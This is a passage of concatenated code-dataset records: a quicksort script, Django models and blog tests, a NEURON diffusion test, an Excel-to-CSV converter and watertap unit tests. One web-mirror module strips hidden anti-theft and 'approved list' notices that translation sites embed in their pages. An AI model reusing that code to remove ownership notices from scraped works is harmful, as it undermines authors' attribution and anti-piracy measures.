Pivot option should be \"first\", \"last\", or \"middle\"')\n quit()\n\n\ndef partition(A, pivot):\n pivot_value = A[pivot] # value of the chosen pivot element\n A[0], A[pivot] = A[pivot], A[0]\n i, j = 1, 1\n # i: index of the next element to examine, j: start of the right (>= pivot) partition\n while i < len(A):\n if A[i] < pivot_value:\n A[i], A[j] = A[j], A[i]\n j+=1\n i+=1\n A[0], A[j-1] = A[j-1], A[0]\n return A, j-1\n\n\ndef quick_sort(A, p):\n if len(A) == 1:\n return A, 0\n pivot = get_pivot(A, p)\n A, pivot_position = partition(A,pivot)\n if pivot_position != 0:\n A[:pivot_position], l_comp = quick_sort(A[:pivot_position], p)\n else:\n l_comp = 0\n if pivot_position != len(A)-1:\n A[pivot_position+1:], r_comp = quick_sort(A[pivot_position+1:], p)\n else:\n r_comp = 0\n\n return A, l_comp + r_comp + len(A) - 1\n\n\nwith open('QuickSort.txt') as f:\n A = [int(num) for num in f]\n\nsorted_A, comp = quick_sort(A, 'middle')\nprint(comp)\n","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"297290030","text":"from django.conf import settings # Using User\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.db.models import Q\nfrom .utils import unique_slug_generator\nfrom .validators import validate_category\nfrom django.core.urlresolvers import reverse\n\nUser = settings.AUTH_USER_MODEL\n# Create your models here.\nclass RestaurantLocationQuerySet(models.query.QuerySet):\n def search(self, query):\n if query:\n query = query.strip() # strip surrounding whitespace\n return self.filter(\n Q(name__icontains=query)|\n Q(location__icontains=query)|\n Q(category__icontains=query)|\n Q(category__iexact=query)|\n Q(location__iexact=query)|\n Q(item__contents__icontains=query)\n ).distinct()\n return self\n\nclass RestaurantLocationManager(models.Manager):\n def get_queryset(self):\n return RestaurantLocationQuerySet(self.model, using=self._db)\n\n def search(self, query):\n return self.get_queryset().filter(name__icontains=query)\n\nclass RestaurantLocation(models.Model):\n owner = models.ForeignKey(User) # django models unleashed # class_instance.model_set.all()\n name = models.CharField(max_length=120)\n location = models.CharField(max_length=120, null=True, blank=True)\n category = models.CharField(max_length=120, null=True, blank=False, validators = [validate_category])\n timestamp = models.DateTimeField(auto_now_add=True)\n #my_date_field = models.DateField(auto_now=False, auto_now_add=False)\n slug = models.SlugField(blank=True, null=True)\n\n objects = RestaurantLocationManager() # add Model.objects.all\n\n def __str__(self):\n return self.name\n\n @property\n def title(self):\n return self.name # obj.title\n\n def get_absolute_url(self):\n return reverse('restaurent:detail', kwargs={'slug': self.slug}) # sends the slug to urls.py / views.py\n\ndef rl_pre_save_receiver(sender, instance, *args, **kwargs):\n print('saving...')\n print(instance.timestamp)\n if not instance.name:\n instance.name = \"Another Name\"\n #if not instance.slug:\n # instance.slug = unique_slug_generator(instance)\n instance.category = instance.category.capitalize()\n\ndef rl_post_save_receiver(sender, instance, *args, **kwargs):\n print('saved...')\n print(instance.timestamp)\n\npre_save.connect(rl_pre_save_receiver, sender = RestaurantLocation)\npost_save.connect(rl_post_save_receiver, sender = 
RestaurantLocation)\n","sub_path":"restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366021316","text":"\"\"\"test of pure diffusion with cvode\n\nRobert A McDougal\nMarch 2013 - June 2014\n\"\"\"\n\nfrom neuron import h, crxd as rxd\n\nimport numpy\nimport __main__\n\nname = __main__.__file__\nif name[-3:] == \".py\":\n name = name[:-3]\n\nh.load_file(\"stdrun.hoc\")\n\ndend = h.Section()\ndend.diam = 2\ndend.nseg = 101\ndend.L = 100\n\ndiff_constant = 1\n\nr = rxd.Region(h.allsec())\nca = rxd.Species(\n r, d=diff_constant, initial=lambda node: 1 if 0.4 < node.x < 0.6 else 0\n)\n\n# enable CVode and set atol\nh.CVode().active(1)\nh.CVode().atol(1e-6)\n\nh.finitialize()\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot\n\n for t in [25, 50, 75, 100, 125]:\n h.continuerun(t)\n pyplot.plot([seg.x for seg in dend], ca.states)\n\n pyplot.tight_layout()\n pyplot.savefig(\"{0}.png\".format(name))\nelse:\n for t in [25, 50, 75, 100, 125]:\n h.continuerun(t)\n","sub_path":"share/lib/python/neuron/rxdtests/tests/pure_diffusion_cvode.py","file_name":"pure_diffusion_cvode.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"586025005","text":"\nimport re\nimport tinycss2\n\nfrom . import HtmlProcessor\n\n########################################################################################################################\n#\n#\tMisc fixer classes for various retarded \"protection\" shit translators do.\n#\n########################################################################################################################\n\n\n\nclass HecatesCornerPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\tloggerPath = \"Main.Text.HecatesCorner\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://(?:www\\.)?hecatescorner\\.wordpress\\.com\", url):\n\t\t\tprint(\"hecatescorner Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"hecatescorner doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\n\nclass ZenithNovelsPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.ZenithNovels\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://(?:www\\.)?zenithnovels\\.com\", url):\n\t\t\tprint(\"zenith novels Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"zenith novels doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?white\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass LightNovelsWorldPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.LightNovelsWorld\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://(?:www\\.)?lightnovels\\.world\", url):\n\t\t\tprint(\"lnw Wants 
url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?white\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\n\nclass ShamelessOniisanPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.ShamelessOniisan\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://shamelessoniisan\\.wordpress\\.com\", url):\n\t\t\tprint(\"wwsd Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass WatashiWaSugoiDesuPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.WatashiWaSugoiDesu\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://watashiwasugoidesu\\.wordpress\\.com\", url):\n\t\t\tprint(\"wwsd Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass FantasyBooksLiveProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.FantasyBooksLive\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://fantasy\\-books\\.live\", url):\n\t\t\tprint(\"fbl Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadlinks = soup.find_all('a', href=\"https://fantasy-books.live/approved-list\")\n\t\tfor bad in badlinks:\n\n\t\t\tbad.parent.decompose()\n\n\t\tbadspans = soup.find_all(\"div\", text=re.compile(r\"https://fantasy\\-books\\.live/approved\\-list then this work has been stolen\", re.I))\n\t\tfor bad in badspans:\n\t\t\tprint('baddiv', bad)\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass MayonaizeShrimpLiveProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.MayonaizeShrimp\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://mayonaizeshrimp\\.wordpress\\.com/\", url):\n\t\t\tprint(\"ms Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass RebirthOnlineLiveProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath 
= \"Main.Text.MayonaizeShrimp\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\n\t\tif re.search(r\"^https?://(www\\.)?rebirth\\.online/\", url):\n\t\t\tprint(\"ms Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef process_css_block(self, css_text):\n\n\t\tss = tinycss2.parse_stylesheet(css_text, skip_whitespace=True, skip_comments=True)\n\t\t# print(ss)\n\n\t\tbad_classes = []\n\n\t\tssf = [tmp for tmp in ss if tmp.type == \"qualified-rule\"]\n\t\tfor rule in ssf:\n\t\t\tprelude = rule.prelude\n\t\t\tcontent = rule.content\n\t\t\tprelude = [tmp for tmp in prelude if tmp.type != 'whitespace']\n\t\t\tcontent = [tmp for tmp in content if tmp.type != 'whitespace']\n\t\t\tif (\n\t\t\t\t\tlen(prelude) == 2 and\n\t\t\t\t\tprelude[0].type == \"literal\" and\n\t\t\t\t\tprelude[1].type == \"ident\" and\n\t\t\t\t\tprelude[0].value == \".\" and\n\t\t\t\t\tlen(content) == 4 and\n\t\t\t\t\tcontent[0].type == \"ident\" and\n\t\t\t\t\tcontent[1].type == \"literal\" and\n\t\t\t\t\tcontent[2].type == \"ident\" and\n\t\t\t\t\tcontent[3].type == \"literal\" and\n\t\t\t\t\tcontent[0].lower_value == \"display\" and\n\t\t\t\t\tcontent[2].lower_value == \"none\"\n\t\t\t\t):\n\n\t\t\t\tbad_class = prelude[1].value\n\n\t\t\t\tbad_classes.append(bad_class)\n\t\treturn bad_classes\n\n\tdef preprocessBody(self, soup):\n\t\tstyles = soup.find_all('style')\n\t\tdecomp_classes = []\n\t\tfor style in styles:\n\t\t\tif not style.get_text():\n\t\t\t\tcontinue\n\n\t\t\tnew = self.process_css_block(style.get_text())\n\n\t\t\tdecomp_classes.extend(new)\n\n\t\t# Decompose the annoying inline shit.\n\t\tfor bad_class in decomp_classes:\n\t\t\tbad_p = soup.find_all(\"p\", class_=bad_class)\n\t\t\tfor bad in bad_p:\n\t\t\t\tbad.decompose()\n\n\t\treturn soup\n\n\n","sub_path":"WebMirror/processor/GarbageInlineProcessors.py","file_name":"GarbageInlineProcessors.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"18443073","text":"#!/usr/bin/env python\r\n\r\nimport sys\r\nfrom openpyxl import load_workbook\r\n\r\ndef fix_text(s):\r\n return '' if s is None else s.replace('\\n', '').strip()\r\n\r\nwb = load_workbook(sys.argv[1])\r\nsheet = wb.get_sheet_by_name('amtl.Index 2017 ATC sortiert')\r\n\r\nfor i in range(1, sheet.max_row + 1):\r\n atc = sheet.cell(row=i, column=1).value\r\n name = sheet.cell(row=i, column=3).value\r\n ddd = sheet.cell(row=i, column=5).value\r\n if atc is not None:\r\n print('\"%s\",\"%s\",\"%s\"' % (fix_text(atc), fix_text(name), fix_text(ddd)))\r\n","sub_path":"src/atc_excel2csv.py","file_name":"atc_excel2csv.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626826812","text":"from django.test import TestCase, tag\nfrom django.urls import reverse\nfrom mixer.backend.django import mixer\n\nfrom blog.models import Article, Profile \n\n\nclass ArticleListViewTests(TestCase):\n def test_no_articles(self):\n response = self.client.get(reverse('article_list'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blog/article_list.html')\n self.assertContains(response, 'No articles available yet.')\n\n def test_one_article_published(self):\n \"\"\"\n The view returns the single article even if its the only published\n article.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n response = 
self.client.get(reverse('article_list'))\n self.assertQuerysetEqual(\n response.context['articles'],\n [f'<Article: {article.title}>']\n )\n\n def test_three_published_and_two_unpublished_articles(self):\n \"\"\"\n The `ArticleListView` only displays published articles.\n \"\"\"\n pub_article1 = mixer.blend('blog.article', title='Published Article 1', publish=True)\n unpub_article1 = mixer.blend('blog.article', title='Unpublished Article 1')\n pub_article2 = mixer.blend('blog.article', title='Published Article 2', publish=True)\n unpub_article2 = mixer.blend('blog.article', title='Unpublished Article 2')\n pub_article3 = mixer.blend('blog.article', title='Published Article 3', publish=True)\n response = self.client.get(reverse('article_list'))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n len(response.context['articles']),\n 3\n )\n\n def test_search_if_query_exists(self):\n query = 'python'\n article1 = mixer.blend('blog.article', title='Web dev with Python', publish=True)\n article2 = mixer.blend('blog.article', title='Javascript for beginners', publish=True)\n article3 = mixer.blend('blog.article', title='Build a web app with python and django', publish=True)\n response = self.client.get(reverse('article_list') + '?query=' + query)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n len(response.context['articles']),\n 2\n )\n\n\nclass ArticleDetailViewTests(TestCase):\n def test_unpublished_article(self):\n \"\"\"\n HTTP 404 Not Found is raised when a detail page for an\n unpublished article is requested.\n \"\"\"\n article = mixer.blend('blog.article')\n url = reverse('article_detail', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_published_article(self):\n \"\"\"\n Article details are displayed when a detail page of a\n published article is requested.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n url = reverse('article_detail', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, article.title)\n self.assertTemplateUsed(response, 'blog/article_detail.html')\n\n def test_detail_page_displays_profile_of_article_author(self):\n article = mixer.blend('blog.article', publish=True)\n url = reverse('article_detail', args=(article.slug, ))\n response = self.client.get(url)\n self.assertTemplateUsed(response, 'blog/profile.html')\n\n\nclass DashboardViewTests(TestCase):\n def test_dashboard_page_for_unauthenticated_user(self):\n \"\"\"\n Unauthenticated users cannot access the dashboard page.\n \"\"\"\n response = self.client.get(reverse('dashboard'))\n self.assertNotEqual(response.status_code, 200)\n # unauthenticated users are redirected to the login page\n self.assertEqual(response.status_code, 302)\n\n def test_dashboard_page_for_authenticated_user(self):\n \"\"\"\n Authenticated users access their dashboard page.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n response = self.client.get(reverse('dashboard'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blog/dashboard.html')\n\n def test_dashboard_page_displays_all_user_articles(self):\n \"\"\"\n Authenticated users can view all their articles (both published and\n unpublished) in their dashboard page.\n \"\"\"\n user = mixer.blend('auth.User')\n\n article1 = mixer.blend('blog.article', author=user)\n article2 = mixer.blend('blog.article', author=user, publish=True)\n article3 = 
mixer.blend('blog.article', author=user)\n article4 = mixer.blend('blog.article', author=user, publish=True)\n article5 = mixer.blend('blog.article', author=user, publish=True)\n\n self.client.force_login(user)\n response = self.client.get(reverse('dashboard'))\n self.assertContains(response, article1.title)\n self.assertContains(response, article2.title)\n self.assertContains(response, article3.title)\n self.assertContains(response, article4.title)\n self.assertContains(response, article5.title)\n\n def test_dashboard_displays_user_profile(self):\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n response = self.client.get(reverse('dashboard'))\n self.assertTemplateUsed(response, 'blog/profile.html')\n\n\nclass AddArticleView(TestCase):\n def test_unauthenticated_user(self):\n \"\"\"\n Unauthenticated users cannot create articles so they are\n redirected to the login page first.\n \"\"\"\n response = self.client.get(reverse('create_article'))\n self.assertEqual(response.status_code, 302)\n\n def test_authenticated_user(self):\n \"\"\"\n Authenticated users can create articles.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n response = self.client.get(reverse('create_article'))\n self.assertEqual(response.status_code, 200)\n\n def test_form_valid(self):\n \"\"\"\n A valid form submitted results in a new article.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n data = {\n \"title\": \"New Article\",\n \"content\": \"Fresh content\"\n }\n url = reverse('create_article')\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, 302) # successful post request returns a redirect\n self.assertEqual(Article.objects.count(), 1)\n\n def test_invalid_data(self):\n \"\"\"\n An invalid form does not create a new article.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n data = {\n \"title\": \"New Article\",\n }\n url = reverse('create_article')\n response = self.client.post(url, data)\n self.assertNotEqual(response.status_code, 302) # unsuccessful post request returns same page\n self.assertEqual(Article.objects.count(), 0)\n\n\nclass EditProfileViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.user = mixer.blend('auth.User')\n cls.url = reverse('profile_update', args=(cls.user.profile.pk,))\n\n def test_retrieve_a_profile(self):\n \"\"\"\n The view retreives a `Profile` object.\n \"\"\"\n response = self.client.get(self.url)\n self.assertEqual(\n str(response.context['profile']),\n f'Profile, {self.user.username}'\n )\n\n def test_authenticated_user(self):\n \"\"\"\n Authenticated users can access the edit profile page.\n \"\"\"\n self.client.force_login(self.user)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n\n def test_authenticated_user_can_update_profile(self):\n self.client.force_login(self.user)\n old_profile = self.user.profile\n data = {\n 'user': self.user,\n 'full_name': 'Test User',\n }\n response = self.client.post(self.url, data)\n new_profile = Profile.objects.get(user=self.user)\n \n self.assertNotEqual(old_profile.full_name, new_profile.full_name)\n self.assertEqual(response.status_code, 302)\n \n\nclass UpdateArticleViewTests(TestCase):\n def test_article_updates(self):\n article = mixer.blend('blog.article')\n url = reverse('article_update', args=(article.slug,))\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n data = {\n 'title': 'Updated title',\n 'content': 
'Updated content'\n }\n original_article = article\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, 302)\n\n updated_article = Article.objects.get(pk=1)\n self.assertNotEqual(original_article.title, updated_article.title)\n self.assertEqual(updated_article.title, 'Updated title')\n self.assertEqual(updated_article.content, 'Updated content')\n\n\nclass UserPageViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.user = mixer.blend('auth.User')\n cls.url = reverse('user_page', args=(cls.user.username,))\n\n def test_page_works(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blog/user_page.html')\n\n def test_page_raises_404_for_non_existent_username(self):\n self.url = reverse('user_page', args=('unknown',))\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 404)\n\n def test_page_works_and_returns_user_articles(self):\n \"\"\"\n The `user_page` returns all the user articles.\n \"\"\"\n response = self.client.get(self.url)\n self.assertQuerysetEqual(\n response.context['user_articles'],\n self.user.article_set.filter(publish=True)\n )\n\n\nclass LikeViewTests(TestCase):\n\n def test_like_article_by_unauthenticated_user(self):\n \"\"\"\n Uauthenticated users are redirected to the `login` page before they\n can like an article.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n url = reverse('like_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.like_set.count(), 0)\n\n def test_like_article_by_authenticated_user(self):\n \"\"\"\n Authenticated users can like articles.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('like_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.like_set.count(), 1)\n\n def test_undo_like(self):\n \"\"\"\n User can undo a like action by liking the article again.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('like_article', args=(article.slug, ))\n response = self.client.get(url)\n\n # like the article again\n response = self.client.get(url)\n self.assertEqual(article.like_set.count(), 0)\n\n\nclass DislikeViewTests(TestCase):\n\n def test_dislike_article_by_unauthenticated_user(self):\n \"\"\"\n Uauthenticated users are redirected to the `login` page before they\n can dislike an article.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n url = reverse('dislike_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.dislike_set.count(), 0)\n\n def test_dislike_article_by_authenticated_user(self):\n \"\"\"\n Aauthenticated users can dislike articles.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('dislike_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.dislike_set.count(), 1)\n\n def test_undo_dislike(self):\n \"\"\"\n User can undo a dislike action by disliking the article again.\n \"\"\"\n user = mixer.blend('auth.User')\n 
self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('dislike_article', args=(article.slug, ))\n response = self.client.get(url)\n\n # dislike the article again\n response = self.client.get(url)\n self.assertEqual(article.dislike_set.count(), 0)\n","sub_path":"blog/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":13109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49425199","text":"###############################################################################\n# WaterTAP Copyright (c) 2021, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National\n# Laboratory, National Renewable Energy Laboratory, and National Energy\n# Technology Laboratory (subject to receipt of any required approvals from\n# the U.S. Dept. of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#\n###############################################################################\n\"\"\"\nTests for zero-order anaerobic MBR-MEC model\n\"\"\"\nimport pytest\n\nfrom io import StringIO\nfrom pyomo.environ import (\n ConcreteModel,\n Constraint,\n value,\n Var,\n assert_optimal_termination,\n units as pyunits,\n)\nfrom pyomo.util.check_units import assert_units_consistent\n\nfrom idaes.core import FlowsheetBlock\nfrom idaes.core.util import get_solver\nfrom idaes.core.util.model_statistics import degrees_of_freedom\nfrom idaes.core.util.testing import initialization_tester\n\nfrom watertap.unit_models.zero_order import AnaerobicMBRMECZO\nfrom watertap.core.wt_database import Database\nfrom watertap.core.zero_order_properties import WaterParameterBlock\n\nsolver = get_solver()\n\n\nclass TestAnaerobicMBRMECZO:\n @pytest.fixture(scope=\"class\")\n def model(self):\n m = ConcreteModel()\n m.db = Database()\n\n m.fs = FlowsheetBlock(default={\"dynamic\": False})\n m.fs.params = WaterParameterBlock(\n default={\n \"solute_list\": [\n \"cod\",\n \"nonbiodegradable_cod\",\n \"ammonium_as_nitrogen\",\n \"phosphate_as_phosphorous\",\n ]\n }\n )\n\n m.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": m.fs.params, \"database\": m.db}\n )\n\n m.fs.unit.inlet.flow_mass_comp[0, \"H2O\"].fix(0.043642594)\n m.fs.unit.inlet.flow_mass_comp[0, \"cod\"].fix(1.00625e-4)\n m.fs.unit.inlet.flow_mass_comp[0, \"nonbiodegradable_cod\"].fix(1e-20)\n m.fs.unit.inlet.flow_mass_comp[0, \"ammonium_as_nitrogen\"].fix(4.59375e-06)\n m.fs.unit.inlet.flow_mass_comp[0, \"phosphate_as_phosphorous\"].fix(2.1875e-06)\n\n return m\n\n @pytest.mark.unit\n def test_build(self, model):\n assert model.fs.unit.config.database == model.db\n\n assert isinstance(model.fs.unit.electricity, Var)\n assert isinstance(model.fs.unit.energy_electric_flow_vol_inlet, Var)\n assert isinstance(model.fs.unit.electricity_consumption, Constraint)\n\n @pytest.mark.component\n def test_load_parameters(self, model):\n data = model.db.get_unit_operation_parameters(\"anaerobic_mbr_mec\")\n\n model.fs.unit.load_parameters_from_database(use_default_removal=True)\n\n assert model.fs.unit.recovery_frac_mass_H2O[0].fixed\n assert (\n model.fs.unit.recovery_frac_mass_H2O[0].value\n == data[\"recovery_frac_mass_H2O\"][\"value\"]\n )\n\n for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():\n 
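# every removal fraction must be fixed after loading; solutes missing from the database entry fall back to the default value (use_default_removal=True above)\n 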
assert v.fixed\n if j not in data[\"removal_frac_mass_solute\"].keys():\n assert v.value == data[\"default_removal_frac_mass_solute\"][\"value\"]\n else:\n assert v.value == data[\"removal_frac_mass_solute\"][j][\"value\"]\n\n assert model.fs.unit.energy_electric_flow_vol_inlet.fixed\n assert (\n model.fs.unit.energy_electric_flow_vol_inlet.value\n == data[\"energy_electric_flow_vol_inlet\"][\"value\"]\n )\n\n @pytest.mark.component\n def test_degrees_of_freedom(self, model):\n assert degrees_of_freedom(model.fs.unit) == 0\n\n @pytest.mark.component\n def test_unit_consistency(self, model):\n assert_units_consistent(model.fs.unit)\n\n @pytest.mark.component\n def test_initialize(self, model):\n initialization_tester(model)\n\n @pytest.mark.solver\n @pytest.mark.skipif(solver is None, reason=\"Solver not available\")\n @pytest.mark.component\n def test_solve(self, model):\n results = solver.solve(model)\n\n # Check for optimal solution\n assert_optimal_termination(results)\n\n @pytest.mark.solver\n @pytest.mark.skipif(solver is None, reason=\"Solver not available\")\n @pytest.mark.component\n def test_solution(self, model):\n assert pytest.approx(3780 / 3600 / 24 / 1000, rel=1e-5) == value(\n model.fs.unit.properties_in[0].flow_vol\n )\n assert pytest.approx(2.3, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"cod\"]\n )\n assert pytest.approx(0, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"nonbiodegradable_cod\"]\n )\n assert pytest.approx(0.105, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"ammonium_as_nitrogen\"]\n )\n assert pytest.approx(0.05, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"phosphate_as_phosphorous\"]\n )\n\n assert pytest.approx(1500 / 3600 / 24 / 1000, rel=1e-2) == value(\n model.fs.unit.properties_treated[0].flow_vol\n )\n assert pytest.approx(2.8958, rel=1e-5) == value(\n model.fs.unit.properties_treated[0].conc_mass_comp[\"cod\"]\n )\n assert pytest.approx(4.60445e-05, rel=1e-5) == value(\n model.fs.unit.properties_treated[0].conc_mass_comp[\"nonbiodegradable_cod\"]\n )\n\n assert pytest.approx(2280 / 3600 / 24 / 1000, rel=1e-2) == value(\n model.fs.unit.properties_byproduct[0].flow_vol\n )\n assert pytest.approx(3.0331e-05, rel=1e-5) == value(\n model.fs.unit.properties_byproduct[0].conc_mass_comp[\"cod\"]\n )\n assert pytest.approx(1.90757, rel=1e-5) == value(\n model.fs.unit.properties_byproduct[0].conc_mass_comp[\"nonbiodegradable_cod\"]\n )\n assert pytest.approx(4.347, rel=1e-3) == value(\n pyunits.convert(\n model.fs.unit.properties_byproduct[0].flow_mass_comp[\n \"nonbiodegradable_cod\"\n ],\n to_units=pyunits.kg / pyunits.day,\n )\n )\n assert pytest.approx(0, abs=1e-5) == value(model.fs.unit.electricity[0])\n\n @pytest.mark.solver\n @pytest.mark.skipif(solver is None, 